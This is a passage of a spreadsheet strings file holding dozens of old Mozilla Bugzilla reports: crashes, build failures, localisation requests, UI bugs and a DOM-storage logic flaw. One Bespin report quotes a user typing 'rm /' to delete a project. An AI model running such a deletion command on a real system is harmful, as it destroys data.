mozilla/browser/app/macbuild/Contents/Resources/English.lproj/InfoPlist.strings) with a Firefox branded one from somewhere under mozilla/other-licenses.
see bug #343825 for more info about why this would be good.
Note this file is UTF16 and contains something like:
  1 /* Localized versions of Info.plist keys */
  2 
  3 CFBundleName = Bon Echo
  4 NSHumanReadableCopyright = Copyright Â© 1998 - 2006 Contributors.
Note the tbird version is not UTF16 so it is lxr'able and editable with simple editors.  (See http://lxr.mozilla.org/mozilla1.8/source/mail/app/macbuild/Contents/Resources/English.lproj/InfoPlist.strings)
Does anyone know why the firefox one is UTF16?</t>
  </si>
  <si>
    <t>THUNDERBIRD-359653</t>
  </si>
  <si>
    <t>Consolidate Offline Management in the Front End</t>
  </si>
  <si>
    <t>Currently we have offline functionality spread out in many JS files in the thunderbird front end. Some of it is still code living in xpfe\communicator\utilityOverlay.js.
We should have a single offline manager class in the front end consolidating offline functionality to this class. Having all of the pieces in one place will make it easier to implement and more importantly to make adjustments to Bug 359134 (integrate with necko's automatic online / offline manager)</t>
  </si>
  <si>
    <t>CORE-505711</t>
  </si>
  <si>
    <t>Compilation failure on MinGW in gfx/thebes</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1
Build Identifier: 
I get following error:
gfx/thebes/src/gfxWindowsFonts.cpp:1132: error: conversion from `gfxWindowsFont*' to non-scalar type `nsAutoPtr' requested
The error is caused by using assignment expression to initialize tempFont. Using a constructor argument fixes the problem.
Reproducible: Always</t>
  </si>
  <si>
    <t>CORE-494336</t>
  </si>
  <si>
    <t>test_bug482461.html randomly fails</t>
  </si>
  <si>
    <t>Created attachment 379040
fix
I caught this random failure in a debugger with extensive logging enabled. Decoding appears to be stalled with mBufferExhausted set to 1 but we're still in DECODER_STATE_DECODING. Unfortunately gdb is super-lame in my Linux VM and can't give me stacks for non-main threads but it seems to me that the loop while (mDecodedFrames.IsEmpty() &amp;&amp; !mIsDecodingCompleted) needs to also check mBufferExhausted otherwise we can get into a situation where mBufferExhausted is 1 the step decode thread is Wait()ing indefinitely under if (mDecodeStateMachine-&gt;mBufferExhausted) and the decoder thread is simply looping in its while loop.
Of course I can't verify that my patch fixes the bug but it does seem necessary.
I moved the NotifyAll to after we set mBufferExhausted to true. We don't want the decoder thread to wake up see that mBufferExhausted is false and go to sleep again.
I removed the check for mState == DECODER_STATE_DECODING because nothing could have released the monitor since the last check of mState and this confusingly implies that something could have.</t>
  </si>
  <si>
    <t>CORE-309095</t>
  </si>
  <si>
    <t>Text in SVG does not show up</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8b4) Gecko/20050908 Firefox/1.4
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8b4) Gecko/20050908 Firefox/1.4
In Firefox 1.5 Beta 1 on Windows the Add Forum text in SVG code is shown. 
However in Firefox 1.5 Beta 1 on Linux the text does not show up.
Reproducible: Always
Steps to Reproduce:
1. Unzip the attached zip file.
2. Open the file svgbug.xhtml.
3.
Actual Results:  
On Firefox 1.5 Beta 1 on Windows the first image (SVG) is the same as the
second image (PNG).  On Firefox 1.5 Beta 1 on Linux the first image (SVG) is
not the same as the third image (PNG).  The text Add Forum is missing.
Expected Results:  
The text Add Forum should be shown using Firefox 1.5 Beta 1 on Linux</t>
  </si>
  <si>
    <t>CheongTM</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-394220</t>
  </si>
  <si>
    <t>publish hebrew 2.0.0.6 start page for thunderbird</t>
  </si>
  <si>
    <t>Please tag the following files for production thanks
Added: 2.0.0.6
Added: 2.0.0.6/start
Added: 2.0.0.6/start/index.html
Added: 2.0.0.6/start/thunderbird_startpage.png
Committed revision 6366.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-466523</t>
  </si>
  <si>
    <t>please re-image qm-pvista-talos03</t>
  </si>
  <si>
    <t>qm-pvista-talos03 is giving results that don't line up with what qm-pvista-talos01/02 have been giving.
Please re-image this machine hopefully it will give more consistent results when it comes back up.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-462190</t>
  </si>
  <si>
    <t>create two new VMs for sse disabled unittests</t>
  </si>
  <si>
    <t>Build needs a VM instance with SSE disabled.  Failing that we need to disable SSE on a mac mini.  Is this possible?  If so how?  We'll need a Windows and Linux VM or mini for build built of the ref images for unit testing.</t>
  </si>
  <si>
    <t>FIREFOX-502671</t>
  </si>
  <si>
    <t>Counter links on about:me Dont work</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.2a1pre) Gecko/20090706 Minefield/3.6a1pre
Build Identifier: Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.2a1pre) Gecko/20090706 Minefield/3.6a1pre
The counter links on the Hourly Browsing Activity do not work.  Nothing opens and an error is fired:
Error: uncaught exception: [Exception... Component returned failure code: 0x80070057 (NS_ERROR_ILLEGAL_VALUE) [mozIStorageStatement.getParameterIndex]  nsresult: 0x80070057 (NS_ERROR_ILLEGAL_VALUE)  location: JS frame :: chrome://aboutme/content/aboutMe.js :: processQuery :: line 621  data: no]
Reproducible: Always
Steps to Reproduce:
1. install about:me extension
2. open error console
3. click on any of the counter links on Hourly Browsing Activity
Actual Results:  
no links open
Expected Results:  
links open</t>
  </si>
  <si>
    <t>margaret.leibovic</t>
  </si>
  <si>
    <t>BUGZILLA-430012</t>
  </si>
  <si>
    <t>Templates in extensions are not precompiled</t>
  </si>
  <si>
    <t>split from bug 428607.
There is no precompilation for extension templates. these need to be precompiled and deleted when not in use.
Note - see bug 420011 - disabled extensions should not have templates be precompiled. They should however be deleted. Practically this probably means that enabling/disabling an extension requires a checksetup run. I don't know if thats documented anywhere but it seems sensible to me...</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-523053</t>
  </si>
  <si>
    <t>tr: Missing main.lang entries</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux x86_64 en-US rv:1.9.1.3) Gecko/20091007 Ubuntu/9.10 (karmic) Firefox/3.5.3
Build Identifier: 
Please use the attached patch to add missing Turkish entries of main.lang file for moazilla.org site.
Reproducible: Always</t>
  </si>
  <si>
    <t>CORE-70587</t>
  </si>
  <si>
    <t>Submenus of items in Imported NetPositive Bookmarks displaced</t>
  </si>
  <si>
    <t>On BeOS build 2001021912 and 2001022211 the submenus of bookmarks in the menu
Imported NetPositive Bookmarks are displaced to the left and downwards even
though there would be enough place right beside the super-menu.</t>
  </si>
  <si>
    <t>TOOLKIT-375861</t>
  </si>
  <si>
    <t>nsAppshellService shouldn't default to a hiddenWindow url that might not exist</t>
  </si>
  <si>
    <t>STR:
1. Start a xulrunner app without a browser.hiddenWindowChromeURL pref set and that doesn't override chrome://global/content/hiddenWindow.xul.
Actual results:
2. Observe dialog that claims it can't find the file and find various weirdities in app functioning later on (cf. bug 372453)
Expected results:
2. No dialog app attempts to function normally (latter is probably cause for other bugs but just to get the dialog out of the way this should be fixed I think).
Note that bug 297543 means we can't just turn it into about:blank (at least as far as I can tell that's what it means). It also makes me wonder why Mac uses a different thing from the rest of the world and whether or not we can change that.
CC-ing bsmedberg for answers on the latter questions.</t>
  </si>
  <si>
    <t>THUNDERBIRD-234793</t>
  </si>
  <si>
    <t>Display preferred format  in columns and make it editable</t>
  </si>
  <si>
    <t>User-Agent:       
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.6) Gecko/20040206 Firefox/0.8
In address book make it possible to 
Display preferred format in columns
make it editable
or the ability to bulk set such a property.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>david.valentine</t>
  </si>
  <si>
    <t>CORE-383547</t>
  </si>
  <si>
    <t>Convert font height ascent descent and max-advance to integers conservatively</t>
  </si>
  <si>
    <t>Created attachment 267524
fix
See discussion in bug 216418. We need nsThebesFontMetrics to convert these values conservatively so that other font metrics converters (i.e. new textframe) don't overflow the metrics reported by nsThebesFontMetrics.</t>
  </si>
  <si>
    <t>BUGZILLA-323563</t>
  </si>
  <si>
    <t>Mail Transport Config is a confusing name for a params section</t>
  </si>
  <si>
    <t>Instead of Mail Transport Config let's just call it Email. That would make a lot more sense.</t>
  </si>
  <si>
    <t>FIREFOX-493602</t>
  </si>
  <si>
    <t>UMR when clicking history menu</t>
  </si>
  <si>
    <t>==58681== Conditional jump or move depends on uninitialised value(s)
==58681==    at 0x613AA: dosprintf (in /Users/sayrer/dev/clean-debug-tracemonkey/nsprpub/pr/src/libnspr4.dylib)
==58681==    by 0x61D94: PR_vsnprintf (in /Users/sayrer/dev/clean-debug-tracemonkey/nsprpub/pr/src/libnspr4.dylib)
==58681==    by 0x3D44D85: nsPrintfCString::nsPrintfCString(unsigned int char const* ...) (in /Users/sayrer/dev/clean-debug-tracemonkey/toolkit/library/XUL)
==58681==    by 0x3B4789A: nsNavHistory::ConstructQueryString(nsCOMArray const&amp; nsNavHistoryQueryOptions* nsCString&amp; int&amp; nsDataHashtable&amp;) (in /Users/sayrer/dev/clean-debug-tracemonkey/toolkit/library/XUL)
==58681==    by 0x3B4B67E: nsNavHistory::GetQueryResults(nsNavHistoryQueryResultNode* nsCOMArray const&amp; nsNavHistoryQueryOptions* nsCOMArray*) (in /Users/sayrer/dev/clean-debug-tracemonkey/toolkit/library/XUL)
==58681==    by 0x3B6F406: nsNavHistoryQueryResultNode::FillChildren() (in /Users/sayrer/dev/clean-debug-tracemonkey/toolkit/library/XUL)
==58681==    by 0x3B7061C: nsNavHistoryQueryResultNode::OpenContainer() (in /Users/sayrer/dev/clean-debug-tracemonkey/toolkit/library/XUL)
==58681==    by 0x3B690BA: nsNavHistoryContainerResultNode::SetContainerOpen(int) (in /Users/sayrer/dev/clean-debug-tracemonkey/toolkit/library/XUL)
==58681==    by 0x3B76489: nsNavHistoryQueryResultNode::SetContainerOpen(int) (in /Users/sayrer/dev/clean-debug-tracemonkey/toolkit/library/XUL)
==58681==    by 0x3D2D070: NS_InvokeByIndex_P (in /Users/sayrer/dev/clean-debug-tracemonkey/toolkit/library/XUL)
==58681==    by 0x2CC4343: XPCWrappedNative::CallMethod(XPCCallContext&amp; XPCWrappedNative::CallMode) (in /Users/sayrer/dev/clean-debug-tracemonkey/toolkit/library/XUL)
==58681==    by 0x2CD3AA6: XPCWrappedNative::SetAttribute(XPCCallContext&amp;) (in /Users/sayrer/dev/clean-debug-tracemonkey/toolkit/library/XUL)
==58681==  Uninitialised value was created by a stack allocation
==58681==    at 0x3B471E0: nsNavHistory::ConstructQueryString(nsCOMArray const&amp; nsNavHistoryQueryOptions* nsCString&amp; int&amp; nsDataHashtable&amp;) (in /Users/sayrer/dev/clean-debug-tracemonkey/toolkit/library/XUL)</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-288124</t>
  </si>
  <si>
    <t>crash in [AutoCompleteTextField performSearch]</t>
  </si>
  <si>
    <t>Thread 0 Crashed:
0   org.mozilla.navigator    	0x00026410 -[AutoCompleteTextField performSearch]
+ 0x78
1   com.apple.Foundation     	0x909f30e4 __NSFireTimer + 0x68
2   com.apple.CoreFoundation 	0x901945f8 __CFRunLoopDoTimer + 0xf4
3   com.apple.CoreFoundation 	0x90191958 __CFRunLoopRun + 0x5c8
4   com.apple.CoreFoundation 	0x90195e6c CFRunLoopRunSpecific + 0x148</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-85202</t>
  </si>
  <si>
    <t>Japanese</t>
  </si>
  <si>
    <t>dialpad.com - does not work</t>
  </si>
  <si>
    <t>I use dialpad to make some long distance calls for free. -)
Dialpad uses a java application to make the call.
Mozilla does not even attempt to download the applet.
steps...
1)log in.
2)dialpad displays your phonebook numbers and loads the java applet to make
calls (in netscape4 and ie5).  Mozilla just displays phonebook but no applet.
I am not sure what component this should go under.</t>
  </si>
  <si>
    <t>japanese</t>
  </si>
  <si>
    <t>jameslariviere</t>
  </si>
  <si>
    <t>DEVTOOLS-819049</t>
  </si>
  <si>
    <t>JS debugging protocol: provide function names in grips</t>
  </si>
  <si>
    <t>In the remote debugging protocol grips are supposed to provide enough information to display a brief summary of the object without further round trips. I'd like to expand the object grips for functions to include their names whether explicit inferred or provided by the developer.
Draft documentation is here:
https://github.com/jimblandy/DebuggerDocs/compare/master...displayName
Quick summary: function grips would look like this:
  { type:object class:Function actor:actor
    name:name displayName:displayName
    userDisplayName:userDisplayName }
We can then drop the 'calleeName' and 'functionName' properties from frame and environment forms as those forms also include function grips the *Name properties would be redundant.
The nameAndParameters request can then become simply parameterNames.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-529248</t>
  </si>
  <si>
    <t>Theme Walnut for Seamonkey needs to be moved to 'Themes' category</t>
  </si>
  <si>
    <t>By default AMO seems to not place Seamonkey themes into the Themes category and there is no way for a developer to move it in the right place.
Can someone move my Walnut for Seamonkey theme to the right category?
https://addons.mozilla.org/en-US/seamonkey/addon/50034
Thanks in advance Alfred</t>
  </si>
  <si>
    <t>CORE-409659</t>
  </si>
  <si>
    <t>[FIX]nsImageControlFrame  is splittable but not listed in nsCSSFrameConstructor::CreateContinuingFrame</t>
  </si>
  <si>
    <t>This leads to a ASSERTION: unexpected frame type at the end of nsCSSFrameConstructor::CreateContinuingFrame once one tries to split this.
I have seen the assert in the at nytimes.com</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-230183</t>
  </si>
  <si>
    <t>preprocessor.pl not executed correctly in /toolkit/mozapps/downloads/src on BeOS</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (BeOS U BeOS BePC en-US rv:1.5b) Gecko/20030817 Mozilla Firebird/0.6.1
Build Identifier: 
/toolkit/mozapps/downloads/src/Makefile don't know what to do with
preprocessor.pl and tries to run it directly without Perl. This causes build error
/bin/sh: ../../../../config/preprocessor.pl: No such file or directory
Reproducible: Always
Steps to Reproduce:
1. Compile Firebird on BeOS
2.
3.
Actual Results:  
Build halts on error
Shouldn't Makefile.in be modified to read
$(PERL) $(MOZILLA_DIR)/config/preprocessor.pl $(DEFINES) $(ACDEFINES) $^ &gt; $@ 
instead of
$(MOZILLA_DIR)/config/preprocessor.pl $(DEFINES) $(ACDEFINES) $^ &gt; $@</t>
  </si>
  <si>
    <t>thesuckiestemail</t>
  </si>
  <si>
    <t>CORE-170446</t>
  </si>
  <si>
    <t>A select form element behaves differently when the size attribute is changed to 1 before being changed to other sizes (as oppsed to vice-versa)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.2a) Gecko/20020910
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.2a) Gecko/20020910
If a select form field is resized to 1 using javascript then resized to &gt;1 it
does not expand the select box size correctly (it still behaves as a pull-down).
On the other hand if the select form field is resized to 5 using javascript
first it expands the select box correctly (and it while thereafter regardless
of being resized to 1 later).
Reproducible: Always
Steps to Reproduce:
1. Load the test URL.
2. Click on the link to set the size of the select box to 1
3. Click on the link to set the size of the select box to 5.
4. Take note of the actual size of the text box.
5. Reload the page.
6. Click on the link to set the size of the select box to 5.
7. Click on the link to set the size of the select box to 1
8. Note that the size of the select box is now correct.
Actual Results:  
The bug was reproduced (observations from step 4 did not match observations from
step 8).
Expected Results:  
When the size of a select box is changed using javascript it should be
reflected in the select box as it is displayed. (see results from step 8)</t>
  </si>
  <si>
    <t>qlorance12</t>
  </si>
  <si>
    <t>BUGZILLA-347096</t>
  </si>
  <si>
    <t>Create Bugzilla-&gt;localconfig and replace most read_localconfig calls with it</t>
  </si>
  <si>
    <t>Now that we have Bugzilla::Install::Localconfig with read_localconfig it should be really easy to make Bugzilla-&gt;localconfig.</t>
  </si>
  <si>
    <t>SKYWRITER_GRAVEYARD-477644</t>
  </si>
  <si>
    <t>How do you remove a project</t>
  </si>
  <si>
    <t>When in a project I tried to remove it by doing a rm /.
All the files were deleted but the project still exists (e.g. shows up in the dashboard).
When I click on it I get:
localhost - - [09/Feb/2009 11:22:02] GET /file/list/bespin/docs/ HTTP/1.1 200 165
[Errno 2] No such file or directory: '/SourceControl/bespin/frontend/file/list/bespin2/'
How should we give people a way to delete a project?
a) Make the rm work
b) right click on a project gives a context menu to delete (longer term)</t>
  </si>
  <si>
    <t>CORE-325479</t>
  </si>
  <si>
    <t>Failure to free a JSScript in obj_eval</t>
  </si>
  <si>
    <t>Michael Daumling pointed this out in a private e-mail to brendan. I've checked in a fix for it on the trunk but we should fix it on the branch too since it's such a simple fix.
The code in question is:
    ok = js_CheckPrincipalsAccess(cx scopeobj principals js_eval_str)
    if (!ok)
        goto out
    ok = js_Execute(cx scopeobj script caller JSFRAME_EVAL rval)
    JS_DestroyScript(cx script)
out:
I'll attach a patch for branch consideration in a second.</t>
  </si>
  <si>
    <t>CORE-494534</t>
  </si>
  <si>
    <t>nsDOMStorage::CanAccessSystem is broken</t>
  </si>
  <si>
    <t>if (NS_SUCCEEDED(ssm-&gt;IsSystemPrincipal(aPrincipal &amp;isSystem) &amp;&amp; isSystem))
probably wants to be:
if (NS_SUCCEEDED(ssm-&gt;IsSystemPrincipal(aPrincipal &amp;isSystem)) &amp;&amp; isSystem)
This means that nsDOMStorage::CanAccessSystem always returns true which seems bad.
msvc warned about this:
c:/moz/mozilla-central/dom/src/storage/nsDOMStorage.cpp(1340) : warning C4806: '&amp;' : unsafe operation: no value of type 'bool' promoted to type 'unsigned int' can equal the given constant</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-512712</t>
  </si>
  <si>
    <t>Upgrade mozilla-central and tryserver to use GCC 4.3.3</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-250052</t>
  </si>
  <si>
    <t>msn.co.uk - boxes not aligned properly</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8a2) Gecko/20040620
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8a2) Gecko/20040620
on http://www.msn.co.uk/Default.asp?Ath=f the bottom 4 boxes 'Latest sports
news' 'MSN Money' 'Offers from MSN Shopping' and 'Search and Buy' souldnt't be
aligned one topic in each row like this
     Latest sports news
     MSN Money
     Offers from MSN Shopping
     Search and Buy
in IE and Opera it aligns like this
     Latest sports news          MSN Money
     Offers from MSN Shopping    Search and Buy
Reproducible: Always
Steps to Reproduce:
1.go to http://www.msn.co.uk/Default.asp?Ath=f
2.
3.</t>
  </si>
  <si>
    <t>nightstalkerz</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-415825</t>
  </si>
  <si>
    <t>sv-se should be used as language string for Swedish (Sweden)</t>
  </si>
  <si>
    <t>When using an en-US build of Firefox the list of languages under Preferences &gt; Content &gt; Languages shows Swedish as sv. It also shows Swedish (Finland) as sv-fi. It seems sv-se is used everywhere else including our source tree.
I would guess there is an automatic fallback in how servers are setup so when we use sv in our accept-lang string the server would probably still serve Swedish but it's not certain it would give sv-se a higher priority than sv-fi if both existed.
Similarly the current intl.accept_languages string is sven-usen. This should be changed to sv-sesven-usen.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-314442</t>
  </si>
  <si>
    <t>Search engine list approval for Slovak FF 1.5</t>
  </si>
  <si>
    <t>All Slovak search plugins have update URLs pointing to secure AMO and named
{plugin}-sk. We also request the approval of folowing search engine list:
google centrum-sk atlas-sk dunaj-sk eBay wikipedia-sk tahaj-sk 
*Web pages search engines*
google - the original Google SE
*Yahoo like portal search engines*
centrum.sk atlas.sk - These are two main yahoo-like portals in Slovak
republic. We ask to use them instead of yahoo that has only few Slovak users.
*Online stores*
dunaj.sk eBay - Dunaj.sk is the main online shops in Slovak republic. We ask
to use it instead of Amazon.com that is not used in Slovak at all.
*Dictionaries*
We ask to remove Answers.com because it is only English dictionary. We prefer
to use Slovak Wikipedia sk.wikipedia.org instead.
*Other*
Tahaj.sk is a Slovak free software repository. We would like to use it instead
of creativecommons.org</t>
  </si>
  <si>
    <t>SEAMONKEY-46331</t>
  </si>
  <si>
    <t>urls dispatched to helper apps are getting added to session history....</t>
  </si>
  <si>
    <t>Load a page like broadcast.com. Click on one of the audio links on the page.
Notice that we dispatch the url to a helper app because mozilla can't handle the
content internally.
Everything looks great. If I try to hit reload we try to reload the helper app
url instead of the actual document url currently loaded in docshell. In
addition if I hit back we again try to lad the helper app url instead of the
previous document we loaded.
Looks like we are incorrectly adding urls that don't result in a document
actually being loaded to session history. So urls that get farmed out to helper
applications are added.
I'll try to investigate this for beta3.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-351865</t>
  </si>
  <si>
    <t>zh-CN searchplugin parameters</t>
  </si>
  <si>
    <t>The zh-CN searchplugin may have an additional parameter that should be passed according to http://wiki.mozilla.org/Firefox2/L10n_Requirements#Yahoo.21
I have a version of the plugin which correctly conditionally has the f= parameter when it's the default searchplugin.
Schrep please let me know if this requirement changed.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-149930</t>
  </si>
  <si>
    <t>bancamediolanum.it - doesn't support W3C standards</t>
  </si>
  <si>
    <t>This is one of the biggest internet banking site in Italy.
It works with IE 5.0+ and Navigator 4.7+ but not with Mozilla as stated at
http://www.bancamediolanum.it/10/02.asp (the FAQ doesn't work with Mozilla too).
There is a lot of bad JavaScript and bad HTML but also bad certificates an so on...</t>
  </si>
  <si>
    <t>davide</t>
  </si>
  <si>
    <t>SEAMONKEY-299633</t>
  </si>
  <si>
    <t>Rebrand unix README</t>
  </si>
  <si>
    <t>Stefan Persson noted in #seamonkey that the Linux installer shows a Mozilla
Read Me instead of it being SeaMonkey-branded. This was missed in the
rebranding changes and we should correct it.
I'll attach a patch in a moment.</t>
  </si>
  <si>
    <t>CORE-303433</t>
  </si>
  <si>
    <t>CVE-2005-4720 Firefox 1.0.6 segfaults on this malformed .html page</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7.10) Gecko/20050716 Firefox/1.0.6
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7.10) Gecko/20050716 Firefox/1.0.6
When browsing to a malformed .html page Firefox will segfault.
Reproducible: Always
Steps to Reproduce:
1.Browse to malformed page.
2.
3.
Actual Results:  
program sefaults creating a core file.
Expected Results:  
parsed the page properly.
not sure.</t>
  </si>
  <si>
    <t>tommy</t>
  </si>
  <si>
    <t>BUGZILLA-109138</t>
  </si>
  <si>
    <t>platform detection not working on macintosh</t>
  </si>
  <si>
    <t>This an email sent to me by Andy Lyttle the day after the b.m.o
upgrade to the bugzilla cvs tip. Did the mozilla user agent
change or did bugzilla detection?
---------------------------
I clicked the link to
http://bugzilla.mozilla.org/enter_bug.cgi?product=Browser and got this:
Possible bug database corruption has been detected. Please send mail to
endico@mozilla.org with details of what you were doing when this message
appeared. Thank you.
src = All Windows 3.1 Windows 95 Windows 98 Windows ME Windows 2000 Windows
NT Windows XP Mac System 7 Mac System 7.5 Mac System 7.6.1 Mac System 8.0
Mac System 8.5 Mac System 8.6 Mac System 9.x MacOS X Linux BSDI FreeBSD
NetBSD OpenBSD AIX BeOS HP-UX IRIX Neutrino OpenVMS OS/2 OSF/1 Solaris SunOS
other
default = Macintosh
I'm logged in as mozilla@phroggy.com.
                        -=[ Andy Lyttle</t>
  </si>
  <si>
    <t>CORE-361892</t>
  </si>
  <si>
    <t>bump application/xhtml+xml back to q=1.0 in the Accept: header when ready</t>
  </si>
  <si>
    <t>Once bug 18333 is fixed application/xhtml+xml should be bumped back to 1.0 in the Accept header. Compare bug 309438</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-514929</t>
  </si>
  <si>
    <t>Switch doctype to HTML5</t>
  </si>
  <si>
    <t>I'd like to propose we switch the doctype of mozilla.org to the one HTML5 will use. Specifically:
There are a number of reasons for this least of which is the fact that most of mozilla.org doesn't validate right now because we moved from an HTML4 doctype to the XHTML 1.0 strict doctype. It's also important for us to promote standards and one which we're highly invested in.
I'll be posting to dev-mozilla-org about this shortly.</t>
  </si>
  <si>
    <t>MOZILLA_QA_GRAVEYARD-638979</t>
  </si>
  <si>
    <t>Expose controller.MouseEvent</t>
  </si>
  <si>
    <t>Tests need it for when the standard click/etc functions aren't rich enough. Expose it as listed here:
https://github.com/mozautomation/mozmill/blob/hotfix-1.5.2/mozmill/mozmill/extension/resource/modules/controller.js#L409</t>
  </si>
  <si>
    <t>gmealer</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-271737</t>
  </si>
  <si>
    <t>Tracking bug for XForms Switch Module</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8a5) Gecko/20041122
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8a5) Gecko/20041122
.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>FIREFOX-354269</t>
  </si>
  <si>
    <t>Stealther extension not working with Firefox 2</t>
  </si>
  <si>
    <t>https://addons.mozilla.org/firefox/1306</t>
  </si>
  <si>
    <t>CALENDAR-390753</t>
  </si>
  <si>
    <t>Event Summary Dialog: Copy is not possible (no context menu or selection)</t>
  </si>
  <si>
    <t>* Create an event
  * put some text into the Description field
* Switch the calendar to Read Only
* reopen the event 
* Select the text you wrote in the Description field
* Context click
* Select Copy.
Result: Clip Board is empty
Expected: Clip Board should be filled with the selected text.</t>
  </si>
  <si>
    <t>vedelaar</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-463663</t>
  </si>
  <si>
    <t>Move document root on support-stage</t>
  </si>
  <si>
    <t>We've reorganized svn so we need to redirect the document root on support stage.
Steps:
1.  Backup DOCROOT/db/local.php somewhere.
2.  svn up
3.  Move DocumentRoot to point at [old document root]/webroot
4.  restart apache
5.  Take the file you backed up in 1.  and copy it to webroot/db/local.php
6.  cd to webroot
7.  ./htaccess.sh
8.  sudo ./setup.sh nobody nobody (if nobody is who apache is running as on here)
Should be good to go.</t>
  </si>
  <si>
    <t>CORE-232639</t>
  </si>
  <si>
    <t>nsXULElement::GetAttrNameAt is severly broken</t>
  </si>
  <si>
    <t>When getting attribute-names from the prototype attributes we need to skip the
prototype attributes that are set locally i.e. in the element itself. However
the current code does this compleatly wrong as far as i can tell.
When asking for attribute N it looks if attribute N is locally and if so steps
to attribute N+1 and loops. However that doesn't take into account if any
attributes before N are set locally. Instead we need to loop through all
prototype attributes until we find the Nth that is not set locally.
Unfortunatly this is slower but the current behaviour seems just outright
broken. Also i doubt that GetAttrNameAt is used in any performance critical places.</t>
  </si>
  <si>
    <t>CORE-366127</t>
  </si>
  <si>
    <t>crash when pictures are opened in a new tab [@ nsDOMImplementation::CreateDocument]</t>
  </si>
  <si>
    <t>Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a2pre) Gecko/20070105 Minefield/3.0a2pre ID:2007010514 [cairo]
repro:
open URL
middleclick on 10-20 pictures to open them in a new tab
result:
Incident ID: 28082571
Stack Signature	nsDOMImplementation::CreateDocument 7c646539
Product ID	FirefoxTrunk
Build ID	2007010507
Trigger Time	2007-01-06 01:49:46.0
Platform	Win32
Operating System	Windows NT 5.1 build 2600
Module	firefox.exe + (0017582b)
URL visited	http://babeswithbooks.blogspot.com/
User Comments	crash when opening &gt;10 pictures in a new tab
Since Last Crash	22169 sec
Total Uptime	22169 sec
Trigger Reason	Access violation
Source File Line No.	e:\builds\tinderbox\fx-trunk\winnt_5.2_depend\mozilla\content\base\src\nsdocument.cpp line 609
Stack Trace 	
nsDOMImplementation::CreateDocument  [mozilla\content\base\src\nsdocument.cpp line 609]
nsCycleCollectionXPCOMRuntime::Traverse  [mozilla\xpcom\base\nscyclecollector.cpp line 954]
GraphWalker::NoteXPCOMChild  [mozilla\xpcom\base\nscyclecollector.cpp line 624]
nsEventListenerManager::FindJSEventListener  [mozilla\content\events\src\nseventlistenermanager.cpp line 807]
nsCycleCollectionXPCOMRuntime::Traverse  [mozilla\xpcom\base\nscyclecollector.cpp line 954]</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-450149</t>
  </si>
  <si>
    <t>Implement cardForProperty on nsIAbDirectory (or nsIAbCollection if it exists)</t>
  </si>
  <si>
    <t>As part of the interface refactoring we want to implement a cardForProperty function (see url).
This can be on nsIAbDirectory in the first instance if nsIAbCollection doesn't exist. There is already a mork-specific implementation on nsIAddrDatabase.</t>
  </si>
  <si>
    <t>Pidgeot18</t>
  </si>
  <si>
    <t>CORE-497023</t>
  </si>
  <si>
    <t>Optimized 4:4:4 Y'CbCr to RGB routines are broken</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux x86_64 en-US rv:1.9.1pre) Gecko/20090608 Shiretoko/3.5pre
Build Identifier: Mozilla/5.0 (X11 U Linux x86_64 en-US rv:1.9.1pre) Gecko/20090608 Shiretoko/3.5pre
Theora has support for 4:4:4 and 4:2:0 visuals but Oggplay is not currently handling them. 
Examples:
http://people.xiph.org/~tterribe/tmp/ducks_take_off_444_720p.ogg
http://people.xiph.org/~tterribe/tmp/mobile_422_ntsc.ogg
Reproducible: Always
Steps to Reproduce:
1. Obtain url for a 4:4:4 or a 4:2:2 video
2. Play in firefox
3. Observe results
Actual Results:  
Mildly psychedelic colors.
Expected Results:  
Correct boring colors.
VLC and Gstreamer (only with the latest patches) are about the only widely distributed playback tools that get 4:2:2 and 4:4:4 support right. Support has existed in the libtheora forever (as well as the specification) but to create these files you previously needed to use some experimental encoder. That is about to change.  
